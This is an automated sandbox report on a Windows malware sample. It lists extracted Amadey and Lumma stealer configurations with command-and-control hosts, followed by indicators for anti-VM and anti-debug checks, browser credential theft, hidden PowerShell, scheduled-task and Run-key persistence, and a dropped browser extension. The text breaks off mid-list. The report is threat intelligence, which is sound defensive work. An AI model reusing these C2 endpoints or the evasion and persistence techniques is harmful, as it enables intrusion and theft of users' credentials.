Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-08-2024 22:07
Static task
static1
Behavioral task
behavioral1
Sample
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
Resource
win10v2004-20240802-en
General
-
Target
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
-
Size
1.8MB
-
MD5
6a87310841f87d194c991b1ce0f7b998
-
SHA1
38f5b601fb4f0d7cf1f53a10682c1a6c53cf2ce8
-
SHA256
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d
-
SHA512
c838f2d581953465bc93dd1481f3370e91c7e7c567243e5410159060a7662dcd3fb1900fa945a76b829f77cc6df70076f6bc33e58794c51a06651c0216762c2f
-
SSDEEP
49152:JcL+RbKLsCpsKOn/qGhmaDdh0Nvm1b/T9O:A+RYjLqoaDAvm1r5O
Malware Config
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
amadey
4.41
a51500
http://api.garageserviceoperation.com
-
install_dir
0cf505a27f
-
install_file
ednfovi.exe
-
strings_key
0044a8b8e295529eaf3743c9bc3171d2
-
url_paths
/CoreOPT/index.php
Extracted
amadey
4.41
cd33f9
http://193.176.158.185
-
install_dir
fed0c9a4d3
-
install_file
Hkbsse.exe
-
strings_key
a2163aef710017f5548e7e730af53cca
-
url_paths
/B0kf3CbAbR/index.php
Extracted
lumma
https://complaintsipzzx.shop/api
https://writerospzm.shop/api
https://deallerospfosu.shop/api
https://bassizcellskz.shop/api
https://mennyudosirso.shop/api
https://languagedscie.shop/api
https://quialitsuzoxm.shop/api
https://tenntysjuxmz.shop/api
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
Beijing.pifRestructuring.pifdescription pid process target process PID 3076 created 3432 3076 Beijing.pif Explorer.EXE PID 3076 created 3432 3076 Beijing.pif Explorer.EXE PID 4876 created 3432 4876 Restructuring.pif Explorer.EXE -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
axplong.exeaxplong.exeaxplong.exeaxplong.exe1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepid process 2920 powershell.exe 3636 powershell.exe 3384 powershell.exe 4176 powershell.EXE 4556 powershell.exe 4180 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 11 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplong.exeaxplong.exeInstall.exeaxplong.exeaxplong.exe1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exebuild2.exe1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeaxplong.exeruntime.exePctOccurred.exeruntime.exeBeijing.pifdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation runtime.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation PctOccurred.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation runtime.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation Beijing.pif -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url cmd.exe -
Executes dropped EXE 23 IoCs
Processes:
axplong.exeruntime.exeaxplong.exeDOC.exeBeijing.pifPctOccurred.exeruntime.exeRestructuring.pifBeijing.pifRestructuring.pif1111.exe385133.exeInstall.exeInstall.exebuild2.exenano.exeHkbsse.exeHkbsse.exeInstall.exeaxplong.exeTFXDRjP.exeHkbsse.exeaxplong.exepid process 3204 axplong.exe 224 runtime.exe 4444 axplong.exe 2224 DOC.exe 3076 Beijing.pif 1160 PctOccurred.exe 4900 runtime.exe 4876 Restructuring.pif 3196 Beijing.pif 456 Restructuring.pif 1080 1111.exe 1160 385133.exe 1884 Install.exe 1792 Install.exe 2924 build2.exe 852 nano.exe 1996 Hkbsse.exe 3484 Hkbsse.exe 5060 Install.exe 3664 axplong.exe 3964 TFXDRjP.exe 4156 Hkbsse.exe 4552 axplong.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplong.exe1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeaxplong.exeaxplong.exeaxplong.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Software\Wine axplong.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
Processes:
forfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exepid process 4304 forfiles.exe 3664 forfiles.exe 5028 forfiles.exe 3476 forfiles.exe 3488 forfiles.exe 4832 forfiles.exe 4068 forfiles.exe 4416 forfiles.exe 1708 forfiles.exe 5036 forfiles.exe 3484 forfiles.exe 1612 forfiles.exe 3836 forfiles.exe 3836 forfiles.exe 4688 forfiles.exe 1732 forfiles.exe 2824 forfiles.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
nano.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WPA Monitor = "C:\\Program Files (x86)\\WPA Monitor\\wpamon.exe" nano.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
nano.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nano.exe -
Drops Chrome extension 1 IoCs
Processes:
TFXDRjP.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json TFXDRjP.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
TFXDRjP.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini TFXDRjP.exe -
Drops file in System32 directory 20 IoCs
Processes:
powershell.exepowershell.exeTFXDRjP.exepowershell.exepowershell.exeInstall.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C TFXDRjP.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C TFXDRjP.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 TFXDRjP.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content TFXDRjP.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 732 tasklist.exe 1964 tasklist.exe 4056 tasklist.exe 4764 tasklist.exe 1008 tasklist.exe 4232 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exepid process 1988 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe 3204 axplong.exe 4444 axplong.exe 3664 axplong.exe 4552 axplong.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Restructuring.pifdescription pid process target process PID 4876 set thread context of 456 4876 Restructuring.pif Restructuring.pif -
Drops file in Program Files directory 8 IoCs
Processes:
nano.exeTFXDRjP.exedescription ioc process File opened for modification C:\Program Files (x86)\WPA Monitor\wpamon.exe nano.exe File created C:\Program Files (x86)\xFHhRZnoU\rvmgQR.dll TFXDRjP.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi TFXDRjP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi TFXDRjP.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak TFXDRjP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak TFXDRjP.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja TFXDRjP.exe File created C:\Program Files (x86)\WPA Monitor\wpamon.exe nano.exe -
Drops file in Windows directory 19 IoCs
Processes:
runtime.exe1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exeruntime.exeschtasks.exeschtasks.exebuild2.exeschtasks.exedescription ioc process File opened for modification C:\Windows\ConfiguringUps runtime.exe File created C:\Windows\Tasks\axplong.job 1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe File opened for modification C:\Windows\EquationExplorer runtime.exe File opened for modification C:\Windows\ConfiguringUps runtime.exe File opened for modification C:\Windows\EquationExplorer runtime.exe File opened for modification C:\Windows\SysOrleans runtime.exe File opened for modification C:\Windows\HostelGalleries runtime.exe File opened for modification C:\Windows\ExplorerProprietary runtime.exe File created C:\Windows\Tasks\bPUvzXzfJRZdhTmsKY.job schtasks.exe File opened for modification C:\Windows\ChestAntique runtime.exe File opened for modification C:\Windows\SysOrleans runtime.exe File opened for modification C:\Windows\ExplorerProprietary runtime.exe File created C:\Windows\Tasks\XsUoLYLFLViNzfg.job schtasks.exe File opened for modification C:\Windows\HostelGalleries runtime.exe File created C:\Windows\Tasks\Hkbsse.job build2.exe File created C:\Windows\Tasks\XvjVthUohNRwdLXcW.job schtasks.exe File opened for modification C:\Windows\TreeProfessor runtime.exe File opened for modification C:\Windows\ChestAntique runtime.exe File opened for modification C:\Windows\TreeProfessor runtime.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 25 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 924 2924 WerFault.exe build2.exe 4236 2924 WerFault.exe build2.exe 4528 2924 WerFault.exe build2.exe 3128 2924 WerFault.exe build2.exe 648 2924 WerFault.exe build2.exe 2688 2924 WerFault.exe build2.exe 456 2924 WerFault.exe build2.exe 4268 2924 WerFault.exe build2.exe 4800 2924 WerFault.exe build2.exe 3128 2924 WerFault.exe build2.exe 4776 1996 WerFault.exe Hkbsse.exe 1992 1996 WerFault.exe Hkbsse.exe 2900 1996 WerFault.exe Hkbsse.exe 5024 1996 WerFault.exe Hkbsse.exe 4176 1996 WerFault.exe Hkbsse.exe 4400 1996 WerFault.exe Hkbsse.exe 5024 1996 WerFault.exe Hkbsse.exe 2012 1996 WerFault.exe Hkbsse.exe 3968 1996 WerFault.exe Hkbsse.exe 3424 1996 WerFault.exe Hkbsse.exe 3544 1996 WerFault.exe Hkbsse.exe 3656 1996 WerFault.exe Hkbsse.exe 4544 3484 WerFault.exe Hkbsse.exe 1960 5060 WerFault.exe Install.exe 4424 4156 WerFault.exe Hkbsse.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exeforfiles.exereg.exereg.exepowershell.execmd.exefindstr.exereg.exereg.exereg.exefindstr.exeforfiles.exereg.exereg.execmd.execmd.exereg.execmd.execmd.execmd.exenano.exegpupdate.exepowershell.exereg.exereg.exereg.exefindstr.exe1111.exepowershell.execmd.exeforfiles.exereg.exereg.exeforfiles.exeaxplong.execmd.exepowershell.exeforfiles.exereg.exereg.exeforfiles.execmd.exeruntime.execmd.exeschtasks.execmd.exeforfiles.exereg.exereg.exefindstr.exeInstall.exepowershell.execmd.exereg.execmd.exereg.exereg.exereg.execmd.exefindstr.exefindstr.exechoice.execmd.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nano.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1111.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language runtime.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
DOC.exe1111.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DOC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DOC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1111.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1111.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exeTFXDRjP.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created 